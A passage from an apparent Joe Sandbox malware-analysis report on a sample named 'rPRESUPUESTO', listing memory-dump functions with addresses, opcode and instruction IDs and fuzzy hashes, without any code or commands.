                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2f100481952033c5c25c1792de4b222c774674215cbe7958c3009050c568c76a
                                                • Instruction ID: cc5135a2e623435f5bfc2e016804c4f8338937f1379cea08b64c7dd708281514
                                                • Opcode Fuzzy Hash: 2f100481952033c5c25c1792de4b222c774674215cbe7958c3009050c568c76a
                                                • Instruction Fuzzy Hash: 7EE092321006549BC321FB2ADD05F9AB7EAEF64360F114525B116575A4CB30A910C794
                                                Function 0188A456 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                • Instruction ID: c56e1fea0f7db1328e19bfcd53841c0332691bc521c6f62883dd0cb486dbdd30
                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                • Instruction Fuzzy Hash: 21E09231010A11DFEB367F2ED84CB52BAE5BF50711F148C2DA196425F0C775D9D0CA40
                                                Function 01854000 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction ID: 8033ce5575bd6357219ed1d64fd56fc4cb026cb367087eaeb186314ef8bcd2b0
                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction Fuzzy Hash: B3E0C2343003058FE795CF1AC044B627BB6FFD5B50F28C068A9488F209EB32E982CB40
                                                Function 0180CA38 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 430a87da9b34da82dee866ef1aa26f67211b66f8b9524c0272537451acaa8877
                                                • Instruction ID: 1a6946086d165ae2aac378bea5412fccd9182f74d89c63e59661cc1d5ba40aad
                                                • Opcode Fuzzy Hash: 430a87da9b34da82dee866ef1aa26f67211b66f8b9524c0272537451acaa8877
                                                • Instruction Fuzzy Hash: 8CD02B724850246ECBB7EA187C08FA33B9B9B44320F0148E0F108D21A5D624CDC196D4
                                                Function 017C823B Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                • Instruction ID: 8dba2cb78faceeee25bc4b9367fb2d9b4bc1e6e69c1b2ab57a5e37b06af344ed
                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                • Instruction Fuzzy Hash: B8E08C32009A20EEDB322E19DC08B51B6A6FF98F10F24486DE0825A0A88670A881DA46
                                                Function 017D2050 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d342f4ad8c3141d23202eb5a5ee00560169aa50614a946780f356b4ab14b8b63
                                                • Instruction ID: c5b2da1e1695e1d8f55b2222000de4f0d2b1a6045929358df87d9fdb2ce7eee8
                                                • Opcode Fuzzy Hash: d342f4ad8c3141d23202eb5a5ee00560169aa50614a946780f356b4ab14b8b63
                                                • Instruction Fuzzy Hash: FCE08C321005546BC211FA5EDD04E5AB3EAEFA4260F100121B151876A8CA30AD01C794
                                                Function 01808A90 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                • Instruction ID: 6908eca031e4d5875070d8c0c5ea5905382d7113e534221d9d45b4e3fccc64b2
                                                • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                • Instruction Fuzzy Hash: F5E08633511A188BC729DE18D911B7277A4EF45720F09463EA613877C1C534E584C795
                                                Function 01826AA4 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                • Instruction ID: 3a0581b9bc3209660d1b70759d82aed2353abf836b769d6920ab77c363ddc910
                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                • Instruction Fuzzy Hash: EAD05E36511A50AFC3329F1BEA04D13FBF9FBC8B107050A6EE94683924C670E846CBA0
                                                Function 0180E59C Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                • Instruction ID: 54c188fc41365de0f53b56a81814e6f62449aea4a8e7c8581f59b5187eb221a9
                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                • Instruction Fuzzy Hash: F9D0A7325045205BD7329A1CFC04FC373D8BB4C724F050459F015C7050C760EC41C644
                                                Function 0184E908 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                • Instruction ID: ddee32e0cda2bab387721af2b03921b7db882086a1d3d1a376dfeedd4a21f6c4
                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                • Instruction Fuzzy Hash: 3FE0EC359506889BDF16DF59C644F5AFBF5BB94B40F150458A1089B6A4CA28E900CB40
                                                Function 017CA0E3 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction ID: 67f6afe1e8bc10b2e9c26e497a7d50af5c5ae4048c711d9992e20ed5350b7140
                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction Fuzzy Hash: FBD0223221203193CB2856556C08F63E955ABC0FE1F1A00AC340B93800C004CC82C2E0
                                                Function 0180A830 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                • Instruction ID: e39bf087aad2a30607393b295c648b17c98b11c887b994672098e6365db304fa
                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                • Instruction Fuzzy Hash: 9FD022370D010CBBCB119F62CC01F907BE8E764BA0F004020B504870A0C63AE860C580
                                                Function 0180CA24 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb81033f999b5f412ef7db48096e73aab9c7702831b0969c6d0a2692158b0848
                                                • Instruction ID: 2d03120bf125b5d3e6ddf64cdf0404be12d60a5ec71907e8fe6294aacdf69e5f
                                                • Opcode Fuzzy Hash: cb81033f999b5f412ef7db48096e73aab9c7702831b0969c6d0a2692158b0848
                                                • Instruction Fuzzy Hash: 49D05230A0100A8BDF2BCF88CA59E2A7AB0FF14740B4000A8EA01D2160E328DA018A20
                                                Function 017E02A0 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                • Instruction ID: eb5aa686dcc401c50712b0690f35bb71e1fa5e45cefc0642fc7494407c61e3ff
                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                • Instruction Fuzzy Hash: 33D09235316A80CFD61A8B0CC5A8B1573E8BB88B44F854490E441CBB22D66CD940CA40
                                                Function 0180C700 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction ID: f95d29c44b8225df215dc44c9d021ef2b82837b90293664dd22010bf9ed1cec1
                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction Fuzzy Hash: 83C01232290648AFC712AA99CD05F02BBE9EBA8B40F000461F2058B6B0C631E820EA84
                                                Function 017F0310 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction ID: fe7b71c1c7b9d3135260a42f55297490e2f8472ae3941797c2bca7b7235149ae
                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction Fuzzy Hash: 2AD0C936100248ABCB019F41C890D9AB72AEB98610F108019B919077118A31A962DA50
                                                Function 017D0750 Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction ID: 4a5c5d3b20ce2e09a354f22e18fc0e6a0b0ca7e9a909a11f62a7d262c71a92ef
                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction Fuzzy Hash: 07C04879711A468FDF16DB6AD298F49B7E4FB48740F1508D0E805CBB22E624E981CA10
                                                Function 01814340 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cafbd52be85449c7a347717305adf9efe75346cce059e40f0b2fbdbef03257a3
                                                • Instruction ID: a923d1af02283242c56a95d1f77790fd1367d7385bac18bd70aeb677362ec4a8
                                                • Opcode Fuzzy Hash: cafbd52be85449c7a347717305adf9efe75346cce059e40f0b2fbdbef03257a3
                                                • Instruction Fuzzy Hash: EE900231605810169541715848855464045A7E1301B55C011E5438554CCE148B9A5362
                                                Function 01814650 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5752e5cf3484a01f5feb68733598987c111eb91c19a4f0312456f4f0250b6c75
                                                • Instruction ID: 609f1dfb2b3b9f99ad09f2bebf62e10c5963d5d9ebcfe2d6aa1f268be67f1f20
                                                • Opcode Fuzzy Hash: 5752e5cf3484a01f5feb68733598987c111eb91c19a4f0312456f4f0250b6c75
                                                • Instruction Fuzzy Hash: 5E900261601510464541715848054066045A7E2301395C115E5568560CCA188A99936A
                                                Function 01812B80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99ff4b6d3b0b6cf83487af2e2dd0d3e872aee83b8d1669bee56c64e5cd3d096c
                                                • Instruction ID: 560123684af33e38cf64cf2c8c6aa46f8fac9693156756b53da4abe9ff328d99
                                                • Opcode Fuzzy Hash: 99ff4b6d3b0b6cf83487af2e2dd0d3e872aee83b8d1669bee56c64e5cd3d096c
                                                • Instruction Fuzzy Hash: 0E90023120141806D50571584805686004597D1301F55C011EB038655EDA658AD57232
                                                Function 01812BA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 844e50f69ac2dba55915a6c0a551ef6c5da5ce557c31d2f4d45f263b6f60b103
                                                • Instruction ID: 6225365ee3691146d26b3fd4fc4875604f41283403c0b3b1fbfec3f2ee95ca4b
                                                • Opcode Fuzzy Hash: 844e50f69ac2dba55915a6c0a551ef6c5da5ce557c31d2f4d45f263b6f60b103
                                                • Instruction Fuzzy Hash: EE90023160541806D55171584415746004597D1301F55C011E5038654DCB558B9977A2
                                                Function 01812BE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff3b86dc7789d5c4c40c868fd5990806e4a92e9a80132d749271452877cfce15
                                                • Instruction ID: 68ad7d84ada682cd0181d428630341b39df23fdf48f3446cb15d4d2f21d5d8d8
                                                • Opcode Fuzzy Hash: ff3b86dc7789d5c4c40c868fd5990806e4a92e9a80132d749271452877cfce15
                                                • Instruction Fuzzy Hash: 9D90023120545846D54171584405A46005597D1305F55C011E5078694DDA258F99B762
                                                Function 01812BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 760e2433f66de56084f7d21719d11dc5fd757038d0737a952316fc670c28a49c
                                                • Instruction ID: fb8dadb9d037d6f100ee6e2ff70bd71fd1647acdc4037a736a45a8f102287f67
                                                • Opcode Fuzzy Hash: 760e2433f66de56084f7d21719d11dc5fd757038d0737a952316fc670c28a49c
                                                • Instruction Fuzzy Hash: 3A90023120141806D5817158440564A004597D2301F95C015E5039654DCE158B9D77A2
                                                Function 01812AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b0fd15ed0f062b28e25009031f9203da21ae45f158b3fc1fb37cd2d094ef9fc
                                                • Instruction ID: 6aab1816f729cc167c39f7035551b555c31879280497ed366f943b4438d5d0a2
                                                • Opcode Fuzzy Hash: 3b0fd15ed0f062b28e25009031f9203da21ae45f158b3fc1fb37cd2d094ef9fc
                                                • Instruction Fuzzy Hash: 229002A1201550964901B2588405B0A454597E1301B55C016E6068560CC9258A959236
                                                Function 01812AD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ee63ff03dc3a7ed4204b00eed60b08af12dd2bcc9f772125b58428aee5a34e0
                                                • Instruction ID: e0d69c483c95bc1a0e120bf4ad395f9867c80954d6b142a19ee8079cab66307a
                                                • Opcode Fuzzy Hash: 6ee63ff03dc3a7ed4204b00eed60b08af12dd2bcc9f772125b58428aee5a34e0
                                                • Instruction Fuzzy Hash: 92900225211410070506B5580705507008697D6351355C021F6029550CDA218AA55222
                                                Function 01812AF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975269752a315de936d7784e938b3614c08fddb2a5148f58f4673bd8f9714ff3
                                                • Instruction ID: ac0a6fd2832834529d3bdaa8dac944df914f2343e7c468d0d6223e2597d45f7e
                                                • Opcode Fuzzy Hash: 975269752a315de936d7784e938b3614c08fddb2a5148f58f4673bd8f9714ff3
                                                • Instruction Fuzzy Hash: 7B900225221410060546B558060550B0485A7D7351395C015F642A590CCA218AA95322
                                                Function 01812DB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d8ee63614ef686d2d52fd28a0677017c8bf166f112ce6ce0794e20ed4030a8e
                                                • Instruction ID: a86e5fd6f110eda708b0a8b98cffb8b3c691f7d317b6f1f034d17f9d21e20fc9
                                                • Opcode Fuzzy Hash: 7d8ee63614ef686d2d52fd28a0677017c8bf166f112ce6ce0794e20ed4030a8e
                                                • Instruction Fuzzy Hash: 7890023124141406D542715844056060049A7D1341F95C012E5438554ECA558B9AAB62
                                                Function 01812DD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c11f828d377f4da50fc1dd1a895e2dbc5ab63ef9219f838ad9031526b3eaf216
                                                • Instruction ID: d88217034d2ca141f2bee9401c08eeaa4b414fa0663a9143381a8a932278f97d
                                                • Opcode Fuzzy Hash: c11f828d377f4da50fc1dd1a895e2dbc5ab63ef9219f838ad9031526b3eaf216
                                                • Instruction Fuzzy Hash: 11900221242451565946B15844055074046A7E1341795C012E6428950CC9269A9AD722
                                                Function 01812D00 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 472af300c02b4d2efa780bd2b5fddc53f2fc6c98d31ed6afd413cd3fd719709f
                                                • Instruction ID: 9cf5f0d54091d5c77c58082bc33484f58f9f9a9a2e0a5c7aaea4e7eec727a0a5
                                                • Opcode Fuzzy Hash: 472af300c02b4d2efa780bd2b5fddc53f2fc6c98d31ed6afd413cd3fd719709f
                                                • Instruction Fuzzy Hash: F490022120545446D50175585409A06004597D1305F55D011E6078595DCA358A95A232
                                                Function 01812D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 753ab0bcf6f680a9e60479f8442757eef1659b41e8e550a91c68e7d0418ca8c4
                                                • Instruction ID: 840de6c0ca619e09f983c85e07cf1d45b48af0a1e52b729fc9abbbb9b40b09ad
                                                • Opcode Fuzzy Hash: 753ab0bcf6f680a9e60479f8442757eef1659b41e8e550a91c68e7d0418ca8c4
                                                • Instruction Fuzzy Hash: 8D90022921341006D5817158540960A004597D2302F95D415E5029558CCD158AAD5322
                                                Function 01812D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66280db40298f9fdedbf9783928bbde22fdd3499e99a9eb7662e89298d891ece
                                                • Instruction ID: d34d3c3e7a75ea215eb09b71a0718d6f50c9f58e6dc82c75cbc79cab4c7f4086
                                                • Opcode Fuzzy Hash: 66280db40298f9fdedbf9783928bbde22fdd3499e99a9eb7662e89298d891ece
                                                • Instruction Fuzzy Hash: 8090022130141007D541715854196064045E7E2301F55D011E5428554CDD158A9A5323
                                                Function 01812CA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84d475abae4b094bab51fcaaba9103775d2f48c0e9bc7ab949db6bd30c8cde0e
                                                • Instruction ID: 1bdf134bcdb2f85ba4fc41037815b059300b9d9e6b5f7067657f06749750b139
                                                • Opcode Fuzzy Hash: 84d475abae4b094bab51fcaaba9103775d2f48c0e9bc7ab949db6bd30c8cde0e
                                                • Instruction Fuzzy Hash: 2D90023120141406D50175985409646004597E1301F55D011EA038555ECA658AD56232
                                                Function 01812CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc02191a4922766295eeb860901008f943c0888bd5d6c0a09c4865d1355d30c5
                                                • Instruction ID: 239041ed5b26eea1eb1cda8da4f862c3c854d415c24eff75b10f54efee917a8c
                                                • Opcode Fuzzy Hash: cc02191a4922766295eeb860901008f943c0888bd5d6c0a09c4865d1355d30c5
                                                • Instruction Fuzzy Hash: 9B90022160541406D54171585419706005597D1301F55D011E5038554DCA598B9967A2
                                                Function 01812CF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
